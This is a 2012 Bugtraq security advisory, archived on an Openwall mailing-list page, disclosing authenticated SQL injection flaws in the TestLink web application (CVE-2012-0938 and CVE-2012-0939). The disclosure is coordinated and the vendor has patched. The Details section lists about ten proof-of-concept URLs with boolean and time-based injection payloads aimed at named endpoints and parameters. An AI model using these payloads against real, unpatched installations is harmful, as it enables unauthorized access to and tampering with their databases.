| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 20 Feb 2012 15:02:17 +0100 From: jnatal <jnatal@...t.inteco.es> To: bugtraq@...urityfocus.com Subject: SQL Injection Vulnerabilities in TestLink ------------------ Information ------------------ Name: SQL Injection Vulnerabilities in TestLink Software tested: TL v1.8.5b & checked in v1.9.3 (prior version may be affected) Vendor Homepage: http://www.teamst.org Vendor Notification: 27 January 2012 Vendor Patch: 4 February 2012 Public Disclosure: 20 February 2012 CVE: CVE-2012-0938 & CVE-2012-0939 Solution Status: Fixed by Vendor ------------------ Description ------------------ TestLink is a web based test management and test execution system. It enables quality assurance teams to create and manage their test cases as well as to organize them into test plans. These test plans allow team members to execute test cases and track test results dynamically. TestLink is a GPL licensed open source project. ------------------ Details ------------------ CVE-2012-0938: TestLink v1.8.5b & 1.9.3 are affected by some SQL Injection vulnerabilities (other versions also maybe affected). To successfully exploit these vulnerabilities, a remote attacker must login with a valid user account. Some cases need a different role to be exploited. CVSS v2: 6.5 Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P Example PoC URLs are: http://example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1 http://example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1 http://example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND 3653=BENCHMARK(5000000,MD5(1)) http://example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7 AND 5912=BENCHMARK(5000000,MD5(1)) http://example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623 AND 5912=BENCHMARK(5000000,MD5(1)) http://example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) http://example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) CVE-2012-0939: TestLink v1.8.5b is affected by some SQL Injection vulnerabilities (other versions also maybe affected). To successfully exploit these vulnerabilities, a remote attacker must login with a valid user account. Some cases need a different role to be exploited. CVSS v2: 6.5 Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P Example PoC URLs are: http://example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622 OR 1=1 http://example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) http://example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND 5912=BENCHMARK(5000000,MD5(1)) ------------------ Solution ------------------ The vendor fixed these vulnerabilities in a patch for version 1.9.3. Please see the references. ------------------ References ------------------ Vendor URL / Patch : http://mantis.testlink.org/view.php?id=4906 CVE-2012-0938: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0938 CVE-2012-0939: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0939 ------------------ Credits ------------------ Researcher: Juan M. Natal Company: INTECO (http://www.inteco.es) Contact: jnatal [at] cert [dot] inteco [dot] es Thanks to: J. Valentin Gutierrez (@vnico) & Juan C. Montes (@jcmontes_tec) ------------------ Disclaimer ------------------ The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible.
Powered by blists - more mailing lists